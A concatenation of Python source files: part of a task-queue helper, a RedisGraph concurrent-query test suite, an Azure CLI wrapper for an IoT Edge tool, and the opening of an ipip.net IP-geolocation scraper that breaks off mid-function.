      queue_names = all_queue_names

    # First pass: collect the task dictionaries matching all filters.
    # Unknown queue names are silently skipped.
    task_dicts = []
    for queue_name in queue_names:
      if queue_name in all_queue_names:
        for task in self.GetTasks(queue_name):
          if url is not None and task['url'] != url:
            continue
          if name is not None and task['name'] != name:
            continue
          task_dicts.append(task)

    # Second pass: convert the matching dictionaries into taskqueue.Task
    # objects.
    tasks = []
    for task in task_dicts:
      # The stored body is base64-encoded; decode to get the raw payload.
      payload = base64.b64decode(task['body'])

      headers = dict(task['headers'])
      # Recompute Content-Length from the decoded payload so it is accurate
      # for the decoded bytes, not the base64 text.
      headers['Content-Length'] = str(len(payload))


      # NOTE(review): the eta format presumably matches what GetTasks emits
      # (via GetTasksAsDicts) — confirm; parsed back into a UTC-aware
      # datetime.
      eta = datetime.datetime.strptime(task['eta'], '%Y/%m/%d %H:%M:%S')
      eta = eta.replace(tzinfo=taskqueue._UTC)

      task_object = taskqueue.Task(name=task['name'], method=task['method'],
                                   url=task['url'], headers=headers,
                                   payload=payload, eta=eta)
      tasks.append(task_object)
    return tasks
test_concurrent_query.py
import os
import sys
import threading
from RLTest import Env
from redisgraph import Graph, Node, Edge
from redis import ResponseError
from base import FlowTestsBase

GRAPH_ID = "G"                      # Graph identifier.
CLIENT_COUNT = 16                   # Number of concurrent connections.
graphs = None                       # One graph object per client.
assertions = [True] * CLIENT_COUNT  # Each thread places its verdict at position threadID.
exceptions = [None] * CLIENT_COUNT  # Each thread which fails sets its exception content at position threadID.
people = ["Roi", "Alon", "Ailon", "Boaz", "Tal", "Omri", "Ori"]


def query_aggregate(graph, query, threadID):
    """Run `query` 10 times; fail the thread if the count ever differs from len(people)."""
    global assertions
    assertions[threadID] = True
    for i in range(10):
        actual_result = graph.query(query)
        person_count = actual_result.result_set[0][0]
        if person_count != len(people):
            assertions[threadID] = False
            break


def query_neighbors(graph, query, threadID):
    """Run `query` 10 times; fail the thread if the result-set size is ever wrong."""
    global assertions
    assertions[threadID] = True

    # Fully connected graph + header row.
    expected_resultset_size = len(people) * (len(people) - 1)

    for i in range(10):
        actual_result = graph.query(query)
        # BUG FIX: the original used `is not` (object identity) to compare two
        # ints; identity comparison is only incidentally correct for small
        # cached ints. Use value inequality.
        if len(actual_result.result_set) != expected_resultset_size:
            assertions[threadID] = False
            break


def query_write(graph, query, threadID):
    """Run a write `query` 10 times; fail the thread on any unexpected stats."""
    global assertions
    assertions[threadID] = True
    for i in range(10):
        actual_result = graph.query(query)
        if actual_result.nodes_created != 1 or actual_result.properties_set != 1:
            assertions[threadID] = False
            break


def thread_run_query(graph, query, threadID):
    """Run `query` once, storing the result (or the error string) at threadID."""
    global assertions
    try:
        assertions[threadID] = graph.query(query)
    except ResponseError as e:
        exceptions[threadID] = str(e)


def delete_graph(graph, threadID):
    """Try to delete the graph; record success/failure at threadID."""
    global assertions
    assertions[threadID] = True
    # Try to delete graph.
    try:
        graph.delete()
    except Exception:
        # Graph deletion failed.
        assertions[threadID] = False


class testConcurrentQueryFlow(FlowTestsBase):
    def __init__(self):
        self.env = Env()
        global graphs
        graphs = []
        for i in range(0, CLIENT_COUNT):
            redis_con = self.env.getConnection()
            graphs.append(Graph(GRAPH_ID, redis_con))
        self.populate_graph()

    def populate_graph(self):
        nodes = {}
        graph = graphs[0]

        # Create entities
        for p in people:
            node = Node(label="person", properties={"name": p})
            graph.add_node(node)
            nodes[p] = node

        # Fully connected graph
        for src in nodes:
            for dest in nodes:
                if src != dest:
                    edge = Edge(nodes[src], "know", nodes[dest])
                    graph.add_edge(edge)

        graph.commit()

    # Count number of nodes in the graph
    def test01_concurrent_aggregation(self):
        q = """MATCH (p:person) RETURN count(p)"""
        threads = []
        for i in range(CLIENT_COUNT):
            graph = graphs[i]
            t = threading.Thread(target=query_aggregate, args=(graph, q, i))
            t.daemon = True  # setDaemon() is deprecated since Python 3.10.
            threads.append(t)
            t.start()

        # Wait for threads to return.
        for i in range(CLIENT_COUNT):
            t = threads[i]
            t.join()
            self.env.assertTrue(assertions[i])

    # Concurrently get neighbors of every node.
    def test02_retrieve_neighbors(self):
        q = """MATCH (p:person)-[know]->(n:person) RETURN n.name"""
        threads = []
        for i in range(CLIENT_COUNT):
            graph = graphs[i]
            t = threading.Thread(target=query_neighbors, args=(graph, q, i))
            t.daemon = True
            threads.append(t)
            t.start()

        # Wait for threads to return.
        for i in range(CLIENT_COUNT):
            t = threads[i]
            t.join()
            self.env.assertTrue(assertions[i])

    # Concurrent writes
    def test_03_concurrent_write(self):
        threads = []
        for i in range(CLIENT_COUNT):
            graph = graphs[i]
            q = """CREATE (c:country {id:"%d"})""" % i
            t = threading.Thread(target=query_write, args=(graph, q, i))
            t.daemon = True
            threads.append(t)
            t.start()

        # Wait for threads to return.
        for i in range(CLIENT_COUNT):
            t = threads[i]
            t.join()
            self.env.assertTrue(assertions[i])

    # Try to delete graph multiple times.
    def test_04_concurrent_delete(self):
        threads = []
        for i in range(CLIENT_COUNT):
            graph = graphs[i]
            t = threading.Thread(target=delete_graph, args=(graph, i))
            t.daemon = True
            threads.append(t)
            t.start()

        # Wait for threads to return.
        for i in range(CLIENT_COUNT):
            t = threads[i]
            t.join()

        # Exactly one thread should have successfully deleted the graph.
        self.env.assertEquals(assertions.count(True), 1)

    # Try to delete a graph while multiple queries are executing.
    def test_05_concurrent_read_delete(self):
        redis_con = self.env.getConnection()

        ##############################################################################################
        # Delete graph via Redis DEL key.
        ##############################################################################################
        self.populate_graph()
        q = """UNWIND (range(0, 10000)) AS x WITH x AS x WHERE (x / 900) = 1 RETURN x"""
        threads = []
        for i in range(CLIENT_COUNT):
            graph = graphs[i]
            t = threading.Thread(target=thread_run_query, args=(graph, q, i))
            t.daemon = True
            threads.append(t)
            t.start()

        redis_con.delete(GRAPH_ID)

        # Wait for threads to return.
        for i in range(CLIENT_COUNT):
            t = threads[i]
            t.join()
            self.env.assertEquals(assertions[i].result_set[0][0], 900)

        # Make sure Graph is empty, e.g. graph was deleted.
        resultset = graphs[0].query("MATCH (n) RETURN count(n)").result_set
        self.env.assertEquals(resultset[0][0], 0)

        ##############################################################################################
        # Delete graph via Redis FLUSHALL.
        ##############################################################################################
        self.populate_graph()
        q = """UNWIND (range(0, 10000)) AS x WITH x AS x WHERE (x / 900) = 1 RETURN x"""
        threads = []
        for i in range(CLIENT_COUNT):
            graph = graphs[i]
            t = threading.Thread(target=thread_run_query, args=(graph, q, i))
            t.daemon = True
            threads.append(t)
            t.start()

        redis_con.flushall()

        # Wait for threads to return.
        for i in range(CLIENT_COUNT):
            t = threads[i]
            t.join()
            self.env.assertEquals(assertions[i].result_set[0][0], 900)

        # Make sure Graph is empty, e.g. graph was deleted.
        resultset = graphs[0].query("MATCH (n) RETURN count(n)").result_set
        self.env.assertEquals(resultset[0][0], 0)

        ##############################################################################################
        # Delete graph via GRAPH.DELETE.
        ##############################################################################################
        self.populate_graph()
        q = """UNWIND (range(0, 10000)) AS x WITH x AS x WHERE (x / 900) = 1 RETURN x"""
        threads = []
        for i in range(CLIENT_COUNT):
            graph = graphs[i]
            t = threading.Thread(target=thread_run_query, args=(graph, q, i))
            t.daemon = True
            threads.append(t)
            t.start()

        graphs[i].delete()

        # Wait for threads to return.
        for i in range(CLIENT_COUNT):
            t = threads[i]
            t.join()
            self.env.assertEquals(assertions[i].result_set[0][0], 900)

        # Make sure Graph is empty, e.g. graph was deleted.
        resultset = graphs[0].query("MATCH (n) RETURN count(n)").result_set
        self.env.assertEquals(resultset[0][0], 0)

    def test_06_concurrent_write_delete(self):
        # Test setup - validate that graph exists and possible results are None
        graphs[0].query("MATCH (n) RETURN n")
        assertions[0] = None
        exceptions[0] = None

        redis_con = self.env.getConnection()
        heavy_write_query = """UNWIND(range(0,999999)) as x CREATE(n)"""
        writer = threading.Thread(target=thread_run_query, args=(graphs[0], heavy_write_query, 0))
        writer.daemon = True
        writer.start()
        redis_con.delete(GRAPH_ID)
        writer.join()
        possible_exceptions = ["Encountered different graph value when opened key " + GRAPH_ID,
                               "Encountered an empty key when opened key " + GRAPH_ID]
        if exceptions[0] is not None:
            self.env.assertContains(exceptions[0], possible_exceptions)
        else:
            self.env.assertEquals(1000000, assertions[0].nodes_created)

    def test_07_concurrent_write_rename(self):
        # Test setup - validate that graph exists and possible results are None
        graphs[0].query("MATCH (n) RETURN n")
        assertions[0] = None
        exceptions[0] = None

        redis_con = self.env.getConnection()
        new_graph = GRAPH_ID + "2"
        # Create new empty graph with id GRAPH_ID + "2"
        redis_con.execute_command("GRAPH.QUERY", new_graph, """MATCH (n) return n""", "--compact")
        heavy_write_query = """UNWIND(range(0,999999)) as x CREATE(n)"""
        writer = threading.Thread(target=thread_run_query, args=(graphs[0], heavy_write_query, 0))
        writer.daemon = True
        writer.start()
        redis_con.rename(new_graph, GRAPH_ID)
        writer.join()
        # Possible scenarios:
        # 1. Rename is done before query is sent. The name in the graph context is new_graph, so when upon commit, when trying to open new_graph key, it will encounter an empty key since new_graph is not a valid key.
        #    Note: As from https://github.com/RedisGraph/RedisGraph/pull/820 this may not be valid since the rename event handler might actually rename the graph key, before the query execution.
        # 2. Rename is done during query executing, so when commiting and comparing stored graph context name (GRAPH_ID) to the retrived value graph context name (new_graph), the identifiers are not the same, since new_graph value is now stored at GRAPH_ID value.
        possible_exceptions = ["Encountered different graph value when opened key " + GRAPH_ID,
                               "Encountered an empty key when opened key " + new_graph]
        if exceptions[0] is not None:
            self.env.assertContains(exceptions[0], possible_exceptions)
        else:
            self.env.assertEquals(1000000, assertions[0].nodes_created)

    def test_08_concurrent_write_replace(self):
        # Test setup - validate that graph exists and possible results are None
        graphs[0].query("MATCH (n) RETURN n")
        assertions[0] = None
        exceptions[0] = None

        redis_con = self.env.getConnection()
        heavy_write_query = """UNWIND(range(0,999999)) as x CREATE(n)"""
        writer = threading.Thread(target=thread_run_query, args=(graphs[0], heavy_write_query, 0))
        writer.daemon = True
        writer.start()
        set_result = redis_con.set(GRAPH_ID, "1")
        writer.join()
        possible_exceptions = ["Encountered a non-graph value type when opened key " + GRAPH_ID,
                               "WRONGTYPE Operation against a key holding the wrong kind of value"]
        if exceptions[0] is not None:
            # If the SET command attempted to execute while the CREATE query was running,
            # an exception should have been issued.
            self.env.assertContains(exceptions[0], possible_exceptions)
        else:
            # Otherwise, both the CREATE query and the SET command should have succeeded.
            self.env.assertEquals(1000000, assertions[0].nodes_created)
            self.env.assertEquals(set_result, True)

    def test_09_concurrent_multiple_readers_after_big_write(self):
        # Test issue #890
        global assertions
        global exceptions
        redis_con = self.env.getConnection()
        redis_graph = Graph("G890", redis_con)
        redis_graph.query("""UNWIND(range(0,999)) as x CREATE()-[:R]->()""")
        read_query = """MATCH (n)-[r:R]->(m) RETURN n, r, m"""
        assertions = [True] * CLIENT_COUNT
        exceptions = [None] * CLIENT_COUNT

        threads = []
        for i in range(CLIENT_COUNT):
            t = threading.Thread(target=thread_run_query, args=(redis_graph, read_query, i))
            t.daemon = True
            threads.append(t)
            t.start()

        for i in range(CLIENT_COUNT):
            t = threads[i]
            t.join()

        for i in range(CLIENT_COUNT):
            self.env.assertIsNone(exceptions[i])
            self.env.assertEquals(1000, len(assertions[i].result_set))
azurecli.py
import json
import os
import signal
import subprocess
import sys
from io import StringIO
from threading import Thread, Timer

from azure.cli.core import get_default_cli
from fstrings import f
from six.moves.queue import Empty, Queue

from . import telemetry
from .compat import PY2

if PY2:
    from .compat import FileNotFoundError

output_io_cls = StringIO


def get_query_argument_for_id_and_name(token):
    """Build a JMESPath filter matching items whose id starts with, or whose name contains, `token`."""
    return "[?starts_with(@.id,'{0}') || contains(@.name,'{1}')]".format(token.lower(), token)


class AzureCli:
    """Thin wrapper around the `az` CLI (both in-process and subprocess invocation)."""

    def __init__(self, output, envvars, cli=get_default_cli()):
        self.output = output
        self.envvars = envvars
        self.az_cli = cli
        self.process = None
        self._proc_terminated = False

    def decode(self, val):
        """Decode subprocess byte output to a stripped UTF-8 string."""
        return val.decode("utf-8").strip()

    def is_posix(self):
        return self.envvars.is_posix()

    def prepare_az_cli_args(self, args, suppress_output=False):
        """Prefix `args` with `az`; optionally append a query that yields no output."""
        if suppress_output:
            args.extend(["--query", "\"[?n]|[0]\""])
        az_args = ["az"] + args
        return az_args

    def invoke_az_cli_outproc(self, args, error_message=None, stdout_io=None, stderr_io=None,
                              suppress_output=False, timeout=None):
        """Run `az` in a subprocess.

        Returns True on success, False on failure. `monitor-events` commands are
        streamed via _handle_monitor_event_process; other commands buffer their
        output into `stdout_io`/`stderr_io` when given.
        """
        try:
            if timeout:
                timeout = int(timeout)
            monitor_events = False
            if 'monitor-events' in args:
                monitor_events = True
            self._proc_terminated = False
            # Consider using functools
            if monitor_events:
                # Own process group so the whole tree can be killed on timeout.
                process = subprocess.Popen(
                    self.prepare_az_cli_args(args, suppress_output),
                    shell=not self.is_posix(),
                    stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                    preexec_fn=os.setsid if self.is_posix() else None,
                    creationflags=subprocess.CREATE_NEW_PROCESS_GROUP if not self.is_posix() else 0)
            elif stdout_io or stderr_io:
                process = subprocess.Popen(
                    self.prepare_az_cli_args(args, suppress_output),
                    stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                    shell=not self.is_posix())
            else:
                process = subprocess.Popen(
                    self.prepare_az_cli_args(args, suppress_output),
                    shell=not self.is_posix())
            self.process = process

            timer = None
            if timeout:
                # This Timer will attempt to be accurate but its not always the case in practice
                timer = Timer(float(timeout), self._terminate_process_tree,
                              args=['Timeout set to {0} seconds, which expired as expected.'.format(timeout)])
            try:
                if timer:
                    timer.start()
                if not monitor_events:
                    stdout_data, stderr_data = process.communicate()
                else:
                    return self._handle_monitor_event_process(process)
            finally:
                if timer:
                    timer.cancel()

            if stderr_data and b"invalid_grant" in stderr_data:
                self.output.error(self.decode(stderr_data))
                self.output.info(
                    "Your Azure CLI session has expired. Please re-run `iotedgedev iothub setup` to refresh your credentials.")
                self.logout()
                sys.exit()

            # BUG FIX: stdout_data/stderr_data are bytes (or None); comparing
            # them to the str "" was always unequal. Use truthiness instead.
            if stdout_io and stdout_data:
                stdout_io.writelines(self.decode(stdout_data))
            if stderr_io and stderr_data:
                stderr_io.writelines(self.decode(stderr_data))

            if process.returncode != 0:
                if error_message:
                    self.output.error(error_message)
                self.output.line()
                return False

            if not stdout_io and not stderr_io:
                self.output.line()
        except Exception as e:
            if error_message:
                self.output.error(error_message)
            self.output.error(str(e))
            self.output.line()
            return False
        return True

    def _enqueue_stream(self, stream, queue):
        """Pump lines from a subprocess stream into `queue` until terminated."""
        try:
            while not self._proc_terminated:
                queue.put(stream.readline().decode('utf8').rstrip())
        finally:
            stream.close()

    def _handle_monitor_event_process(self, process, error_message=None):
        """Stream stdout of a `monitor-events` process to the user; report stderr on failure."""
        stdout_queue = Queue()
        stderr_queue = Queue()
        stream_thread_map = {
            'stdout': Thread(target=self._enqueue_stream, args=(process.stdout, stdout_queue), daemon=True),
            'stderr': Thread(target=self._enqueue_stream, args=(process.stderr, stderr_queue), daemon=True)
        }
        stream_thread_map['stdout'].start()
        stream_thread_map['stderr'].start()
        try:
            while not self._proc_terminated:
                if not process.poll():
                    try:
                        self.output.echo(stdout_queue.get_nowait())
                    except Empty:
                        pass
                else:
                    err = None
                    try:
                        err = stderr_queue.get_nowait()
                    except Empty:
                        pass
                    # Avoid empty sys.excepthook errors from underlying future
                    # There is already a uAMQP issue in work for this
                    # https://github.com/Azure/azure-uamqp-python/issues/30
                    if err and "sys.excepthook" not in err:
                        err = err.lstrip()
                        err = err.lstrip('ERROR:')
                        if error_message:
                            err = "{}: {}".format(error_message, err)
                        self.output.error(err)
                        return False
        except KeyboardInterrupt:
            self.output.info('Terminating process...')
            self._terminate_process_tree()
        return True

    def _terminate_process_tree(self, msg=None):
        """Kill the tracked subprocess (and its group on POSIX). Returns True on success."""
        try:
            if self.process:
                if self.is_posix():
                    os.killpg(os.getpgid(self.process.pid), signal.SIGTERM)
                else:
                    self.process.send_signal(signal.CTRL_BREAK_EVENT)
                    self.process.kill()
                self._proc_terminated = True
            if msg:
                self.output.info(msg)
                self.output.line()
            return True
        except Exception:
            return False

    def invoke_az_cli(self, args, error_message=None, stdout_io=None):
        """Run `az` in-process via the azure-cli core. Returns True on success."""
        try:
            exit_code = self.az_cli.invoke(args, out_file=stdout_io)
            if exit_code and exit_code != 0:
                if error_message:
                    self.output.error(error_message)
                return False
        except Exception as e:
            if error_message:
                self.output.error(error_message)
            self.output.error(str(e))
            return False
        self.output.line()
        return True

    def add_extension(self, name):
        return self.invoke_az_cli_outproc(["extension", "add", "--name", name, "--yes"],
                                          f("Error while adding extension {name}."),
                                          suppress_output=True)

    def extension_exists(self, name):
        return self.invoke_az_cli_outproc(["extension", "show", "--name", name, "--output", "table"],
                                          f("Error while checking for extension {name}."),
                                          suppress_output=True)

    def user_has_logged_in(self):
        """Return the cached subscription id if the user is logged in, else None."""
        self.output.header("AUTHENTICATION")
        self.output.status(f("Retrieving Azure CLI credentials from cache..."))
        with output_io_cls() as io:
            result = self.invoke_az_cli_outproc(["account", "show"], stdout_io=io)
            if result:
                try:
                    self.output.prompt("Azure CLI credentials found.")
                    out_string = io.getvalue()
                    data = json.loads(out_string)
                    return data["id"]
                except Exception:
                    pass
        self.output.prompt(
            "Azure CLI credentials not found. Please follow instructions below to login to the Azure CLI.")
        return None

    def login_account(self, username, password):
        return self.invoke_az_cli_outproc(["login", "-u", username, "-p", password],
                                          "Error while trying to login to Azure. Make sure your account credentials are correct",
                                          suppress_output=True)

    def login_sp(self, username, password, tenant):
        return self.invoke_az_cli_outproc(["login", "--service-principal", "-u", username, "-p", password, "--tenant", tenant],
                                          "Error while trying to login to Azure. Make sure your service principal credentials are correct.",
                                          suppress_output=True)

    def login_interactive(self):
        return self.invoke_az_cli_outproc(["login"], "Error while trying to login to Azure.",
                                          suppress_output=True)

    def logout(self):
        return self.invoke_az_cli_outproc(["account", "clear"])

    def list_subscriptions(self):
        self.output.status("Retrieving Azure Subscriptions...")
        return self.invoke_az_cli_outproc(["account", "list", "--all", "--query",
                                           "[].{\"Subscription Name\":name, Id:id}", "--out", "table"],
                                          "Error while trying to list Azure subscriptions.")

    def get_default_subscription(self):
        """Return the id of the default subscription, or '' on failure."""
        with output_io_cls() as io:
            result = self.invoke_az_cli_outproc(["account", "show"],
                                                "Error while trying to get the default Azure subscription id.", io)
            if result:
                out_string = io.getvalue()
                data = json.loads(out_string)
                return data["id"]
        return ''

    def get_subscription_id_starts_with(self, token):
        """Resolve a partial subscription id/name to a full id ('' or `token` on ambiguity/failure)."""
        with output_io_cls() as io:
            query = get_query_argument_for_id_and_name(token)
            result = self.invoke_az_cli_outproc(["account", "list", "--query", query],
                                                "Could not find a subscription for which the id starts with or name contains '{0}'".format(token), io)
            if result:
                out_string = io.getvalue()
                if out_string:
                    data = json.loads(out_string)
                    if len(data) == 1:
                        return data[0]["id"]
                    elif len(data) > 1:
                        self.output.error(
                            "Found multiple subscriptions for which the ids start with or names contain '{0}'. Please enter more characters to further refine your selection.".format(token))
                        return token
                else:
                    self.output.error("Could not find a subscription for which the id starts with or name contains '{0}'.".format(token))
        return ''

    def set_subscription(self, subscription):
        """Set the active subscription (full 36-char id or a resolvable prefix). Returns the id or None."""
        if len(subscription) < 36:
            subscription = self.get_subscription_id_starts_with(subscription)
        if len(subscription) < 36:
            return subscription
        if len(subscription) == 36:
            self.output.status(f("Setting Subscription to '{subscription}'..."))
            result = self.invoke_az_cli_outproc(["account", "set", "--subscription", subscription],
                                                "Error while trying to set Azure subscription.")
            if result:
                return subscription
        return None

    def resource_group_exists(self, name):
        self.output.status(f("Checking if Resource Group '{name}' exists..."))
        with output_io_cls() as io:
            result = self.invoke_az_cli_outproc(["group", "exists", "-n", name],
                                                f("Resource Group {name} does not exist."), io)
            if result:
                out_string = io.getvalue()
                if out_string == "true":
                    return True
        self.output.prompt(f("Resource Group {name} does not exist."))
        return False

    def get_resource_group_location(self, name):
        self.output.status(f("Retrieving Resource Group '{name}' location..."))
        with output_io_cls() as io:
            result = self.invoke_az_cli_outproc(["group", "show", "-n", name, "--query", "location", "--output", "tsv"],
                                                f("Could not retrieve Resource Group {name}'s location."), io)
            if result:
                return io.getvalue()
            else:
                return ''

    def create_resource_group(self, name, location):
        self.output.status(f("Creating Resource Group '{name}' at '{location}'..."))
        with output_io_cls() as io:
            result = self.invoke_az_cli_outproc(["group", "create", "--name", name, "--location", location],
                                                f("Could not create the new Resource Group {name} at location:{location}."), io)
        return result

    def list_resource_groups(self):
        self.output.header("RESOURCE GROUP")
        self.output.status("Retrieving Resource Groups...")
        with output_io_cls() as io:
            result = self.invoke_az_cli_outproc(["group", "list", "--query",
                                                 "[].{\"Resource Group\":name, Location:location}", "--out", "table"],
                                                "Could not list the Resource Groups.", stdout_io=io)
            self.output.prompt(io.getvalue())
        self.output.line()
        return result

    def set_modules(self, device_id, connection_string, config):
        """Deploy the deployment manifest `config` to `device_id`."""
        self.output.status(f("Deploying '{config}' to '{device_id}'..."))
        config = os.path.join(os.getcwd(), config)
        if not os.path.exists(config):
            raise FileNotFoundError('Deployment manifest file "{0}" not found. Please run `iotedgedev build` first'.format(config))
        telemetry.add_extra_props({'iothubhostname': connection_string.iothub_host.name_hash,
                                   'iothubhostnamesuffix': connection_string.iothub_host.name_suffix})
        return self.invoke_az_cli_outproc(["iot", "edge", "set-modules", "-d", device_id,
                                           "-n", connection_string.iothub_host.hub_name,
                                           "-k", config, "-l", connection_string.connection_string],
                                          error_message=f("Failed to deploy '{config}' to '{device_id}'..."),
                                          suppress_output=True)

    def monitor_events(self, device_id, connection_string, hub_name, timeout=300):
        return self.invoke_az_cli_outproc(["iot", "hub", "monitor-events", "-d", device_id, "-n", hub_name,
                                           "-l", connection_string, '-t', str(timeout), '-y'],
                                          error_message=f("Failed to start monitoring events."),
                                          suppress_output=False, timeout=timeout)

    def get_free_iothub(self):
        """Return (name, resource_group) of the first F1 (free-tier) hub, or (None, None)."""
        with output_io_cls() as io:
            result = self.invoke_az_cli_outproc(["iot", "hub", "list"],
                                                f("Could not list IoT Hubs in subscription."), stdout_io=io)
            if result:
                out_string = io.getvalue()
                data = json.loads(out_string)
                for iot in data:
                    if iot["sku"]["name"] == "F1":
                        return (iot["name"], iot["resourceGroup"])
        return (None, None)

    def get_first_iothub(self, resource_group):
        with output_io_cls() as io:
            result = self.invoke_az_cli_outproc(
                ["iot", "hub", "list", "--resource-group", resource_group, "--query", "[0]"],
                f("Could not get first IoT Hub."), io)
            if result:
                out_string = io.getvalue()
                if out_string:
                    data = json.loads(out_string)
                    return data["name"]
        return ''

    def list_iot_hubs(self, resource_group):
        self.output.header("IOT HUB")
        self.output.status(f("Retrieving IoT Hubs in '{resource_group}'..."))
        return self.invoke_az_cli_outproc(["iot", "hub", "list", "--resource-group", resource_group,
                                           "--query", "[].{\"IoT Hub\":name}", "--out", "table"],
                                          f("Could not list the IoT Hubs in {resource_group}."))

    def iothub_exists(self, value, resource_group):
        self.output.status(f("Checking if '{value}' IoT Hub exists..."))
        with output_io_cls() as io:
            result = self.invoke_az_cli_outproc(["iot", "hub", "show", "--name", value,
                                                 "--resource-group", resource_group, "--out", "table"],
                                                stderr_io=io)
        if not result:
            self.output.prompt(f("Could not locate the {value} in {resource_group}."))
        return result

    def create_iothub(self, value, resource_group, sku):
        self.output.status(f("Creating '{value}' in '{resource_group}' with '{sku}' sku..."))
        with output_io_cls() as io:
            with output_io_cls() as error_io:
                self.output.prompt("Creating IoT Hub. Please wait as this could take a few minutes to complete...")
                result = self.invoke_az_cli_outproc(["iot", "hub", "create", "--name", value,
                                                     "--resource-group", resource_group, "--sku", sku,
                                                     "--query", "[].{\"IoT Hub\":name}", "--out", "table"],
                                                    f("Could not create the IoT Hub {value} in {resource_group} with sku {sku}."),
                                                    stdout_io=io, stderr_io=error_io)
                if not result and error_io.getvalue():
                    self.output.error(error_io.getvalue())
                    self.output.line()
                elif io.getvalue():
                    self.output.prompt(io.getvalue())
                    self.output.line()
        return result

    def get_iothub_connection_string(self, value, resource_group):
        self.output.status(f("Retrieving '{value}' connection string..."))
        with output_io_cls() as io:
            result = self.invoke_az_cli_outproc(["iot", "hub", "show-connection-string", "--hub-name", value,
                                                 "--resource-group", resource_group],
                                                f("Could not create the IoT Hub {value} in {resource_group}."),
                                                stdout_io=io)
            if result:
                out_string = io.getvalue()
                data = json.loads(out_string)
                return data["cs"]
        return ''

    def edge_device_exists(self, value, iothub, resource_group):
        self.output.status(f("Checking if '{value}' device exists in '{iothub}'..."))
        with output_io_cls() as io:
            result = self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "show", "--device-id", value,
                                                 "--hub-name", iothub, "--resource-group", resource_group,
                                                 "--out", "table"],
                                                stderr_io=io)
        if not result:
            self.output.prompt(f("Could not locate the {value} device in {iothub} IoT Hub in {resource_group}."))
        return result

    def list_edge_devices(self, iothub):
        self.output.header("EDGE DEVICE")
        self.output.status(f("Retrieving edge devices in '{iothub}'..."))
        return self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "list", "--hub-name", iothub,
                                           "--edge-enabled", "--query", "[].{\"Device Id\":deviceId}",
                                           "--output", "table"],
                                          f("Could not list the edge devices in {iothub} IoT Hub."))

    def create_edge_device(self, value, iothub, resource_group):
        self.output.status(f("Creating '{value}' edge device in '{iothub}'..."))
        return self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "create", "--device-id", value,
                                           "--hub-name", iothub, "--resource-group", resource_group,
                                           "--edge-enabled", "--query", "[].{\"Device Id\":deviceId}",
                                           "--output", "table"],
                                          f("Could not locate the {value} device in {iothub} IoT Hub in {resource_group}."))

    def get_device_connection_string(self, value, iothub, resource_group):
        self.output.status(f("Retrieving '{value}' connection string..."))
        with output_io_cls() as io:
            result = self.invoke_az_cli_outproc(["iot", "hub", "device-identity", "show-connection-string",
                                                 "--device-id", value, "--hub-name", iothub,
                                                 "--resource-group", resource_group],
                                                f("Could not locate the {value} device in {iothub} IoT Hub in {resource_group}."),
                                                stdout_io=io)
            if result:
                out_string = io.getvalue()
                data = json.loads(out_string)
                return data["cs"]
        return ''
ipip.py
#!/usr/bin/python3
"""Query IP/domain geolocation information from https://ipip.net.

Scrapes the result tables (via requests, falling back to a headless
Chrome when the site challenges the visitor) and pretty-prints them.
"""

__author__ = "Kiri Kira"
__licence__ = "GPL"
__email__ = "kiri_so@outlook.com"
__status__ = "production"

import requests
import argparse
import pickle
import os
from bs4 import Tag, BeautifulSoup as soup
from prettytable import PrettyTable
from threading import Timer, Thread
from time import sleep
from selenium import webdriver
from selenium.webdriver.common.keys import Keys

HEADERS = {
    'origin': "http://ipip.net",
    'upgrade-insecure-requests': "1",
    'content-type': "application/x-www-form-urlencoded",
    'user-agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36",
    'accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
    'referer': "http://ipip.net/ip.html",
    'accept-encoding': "gzip, deflate",
    'accept-language': "zh-CN,zh;q=0.9,en;q=0.8,zh-HK;q=0.7,zh-TW;q=0.6",
    'cache-control': "no-cache"
}

PATH_COOKIE = "/tmp/"


class Extractor(object):
    '''The extractor for parsing HTML tables into python lists.'''

    def __init__(self, table):
        if isinstance(table, Tag):
            self.table = table
        elif isinstance(table, soup):
            self.table = table.find_all("table")
        elif isinstance(table, str):
            # BUG FIX: the original passed the *builtin* `str` to the parser
            # instead of the `table` argument.
            self.table = soup(table, 'html.parser').find_all("table")
        else:
            raise Exception('unrecognized type')
        self.output = []

    def parse(self):
        """Return the table as a list of rows, each row a list of cell texts."""
        current_row = 0
        for row in self.table.find_all("tr"):
            for cell in row.children:
                if cell.name in ["th", "td"]:
                    body = cell.text
                    self.insert_cell(current_row, body)
            current_row += 1
        return self.output

    def insert_cell(self, row_number, body):
        if len(self.output) <= row_number:
            self.output.append([])
        self.output[row_number].append(body)


class Rainbow(object):
    """This class is used to print rainbow-like progress animation."""

    def __init__(self, text):
        self.text = text
        self.times = 0
        # ANSI color escape codes 31..37 (red..white).
        self.colors = list(map(lambda num: "\033[" + str(num) + "m", range(31, 38)))
        self.thread = Thread(target=self.cycle)
        self._running = False

    def cprint(self):
        """Print one animation frame, rotating the color of each character."""
        colored_str = ""
        new_colors = self.colors[self.times % 7:] + self.colors[:self.times % 7]
        for i in range(len(self.text)):
            colored_str += new_colors[i % 7] + self.text[i]
        print(colored_str, end="\r")
        self.times += 1

    def cycle(self):
        while self._running:
            self.cprint()
            sleep(0.1)

    def start_shining(self):
        self._running = True
        self.thread.start()

    def stop_shining(self):
        self._running = False
        print("", end="")


def request_ip(url, ip_addr, en=False):
    """POST the query to ipip.net and return the result tables.

    Tries cached cookies first; falls back to a headless browser when the
    plain request is rejected (the Chinese site challenges visitors).
    """
    data = [('ip', ip_addr), ]
    if en:
        response = requests.post(url, headers=HEADERS, data=data)
        return find_table(response.text)
    cookies = load_cookie()
    if cookies:
        response = requests.post(url, headers=HEADERS, data=data, cookies=cookies)
        if response.status_code == 200:
            return find_table(response.text)
    return find_table(selenium_ip(url, ip_addr))


def find_table(source):
    sp = soup(source, 'html.parser')
    tables = sp.find_all("table")
    return tables


def create_driver():
    """Build a headless Chrome driver with analytics blackholed."""
    option = webdriver.ChromeOptions()
    option.add_argument("--headless")
    option.add_argument("--host-resolver-rules=MAP www.google-analytics.com 127.0.0.1")
    option.add_argument('user-agent=Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36')
